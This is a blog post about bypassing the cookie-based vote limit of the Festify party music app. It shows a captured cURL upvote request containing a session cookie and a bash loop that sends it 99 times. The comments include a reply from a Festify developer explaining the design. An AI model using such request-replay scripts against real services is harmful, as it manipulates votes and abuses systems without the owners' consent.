This is why can’t have nice things! // Hack the party

Recently we started using Festify at our Student fraternity Gumbo Millennium. Festify is a really cool app that you can use to let your guests choose what songs they want to hear and prevents a lot of discussion about “what to play next”.

Festify is a free Spotify-powered app that lets your guests choose which music should be played using their smartphones.

But democracy doesn’t work when you want to hear your favourite song!

screen-shot-2016-09-13-at-08-45-03Step 1 – Setup and installation

Festify is really easy to install. You just need the software, Spotify and a Spotify Premium account. After that you can invite guests to the party or they can go to festify.us and enter the party ID.

Step 2 – Adding that funky jam

After joining a party you can add songs and vote on songs other people have edited. See them rise to the top and hope that your song hits the dance floor! Festify doesn’t require registration to vote and this is where the fun starts! Festify uses cookies to register your vote and prevents you from forcing your music on other people. Cookies? Let’s get started!

Step 3 – Capturing the upvote

After adding a song to the que you can’t vote on it. But thats easily solved. Delete you cookies, hard refresh and then you’re able to up-vote a song you just added. Using Chrome Developer tools you’re able to capture the POST request that up votes the song.

screen-shot-2016-09-13-at-08-57-58

After coping this as a cURL request we get:

curl 'http://festify.us/api/parties/57d58ed9a27km0a6640ve8ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d58ed9a27km0a6640ve8ec' -H 'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4' -H 'Connection: keep-alive' --data-binary $'{"name":"I\'m Too Sexy","spotifyID":"2WElktskrNJEwgpp5Vouxk"}' --compressed

Step 4 – Edit the vote and fire the lazer

After capturing it’s easy to remove the cookie in the cURL request

'Cookie: _ga=GA1.2.1227056308.1473749685; _gat=1; connect.sid=s%3AplGQJeKPXu4gzDbLG4PokrG55TKBtBfF.5xiePNNfCVCO7e2KTQ5DW9meQOy81CRdNd26o%2Bvdyu4'

And put it in a script

#!/bin/bash
x=1
while [ $x -le 99 ]
do
  echo "Up-voted $x times"

    curl 'http://festify.us/api/parties/57d16e88a27dd0a66ec/queue' -H 'Origin: http://festify.us' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-GB,en-US;q=0.8,en;q=0.6' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36' -H 'Content-Type: application/json;charset=UTF-8' -H 'Accept: application/json, text/plain, */*' -H 'Referer: http://festify.us/57d16e88a27dd0a66ec'  -H 'Connection: keep-alive' --data-binary '{"name":"Afro Circus/I Like To Move It","spotifyID":"0qNBowxGCvy2mSbg9kmEua"}' --compressed

  x=$(( $x + 1 ))
done

echo "AFRO"

picard-full-of-win1-e1309226314822

Thank you Roelof for making this possible.

#10958 +(9086)- [X]
(morganj): 0 is false and 1 is true, correct?
(alec_eso): 1, morganj
(morganj): bastard.

2 thoughts on “This is why can’t have nice things! // Hack the party

  1. You can leave a lot of the headers you’re sending out of the cURL request, and it would still work :D

    As one of the developers of Festify, it was difficult to use a system that wouldn’t require authentication yet allow a single user to vote only once. Checking by IP address wouldn’t work as multiple devices often share one external IP and requiring social login or, worse, a separate account, would be too much trouble for many users to start voting.

    So, we went with cookies, which works most of the time – except when you hack it, of course ;)
    It’s the easiest way to identify people uniquely and to assure that a normal person doesn’t vote multiple times. Usually, this works just fine.

    We’re thinking about integrating optional social login, so the party admin can decide if users should be allowed to vote anonymously or not. However, this can take some time as Spotify’s currently doesn’t support third party desktop developers anymore.

    Have fun and party on 🎉

    • Hey Leo,

      First of all, thanks so much for replying! Really appreciate it! I totally understand the decision to use cookies. You don’t want anything in the way of people using the app.

      Social logon would be a good option and the option in the admin even better!

      Hoop you will find a way to improve the app even if spotify dropped 3rd party support. Our student fraternity really loves the app and we are having so much fun with it!

      Rock on!

Leave a Reply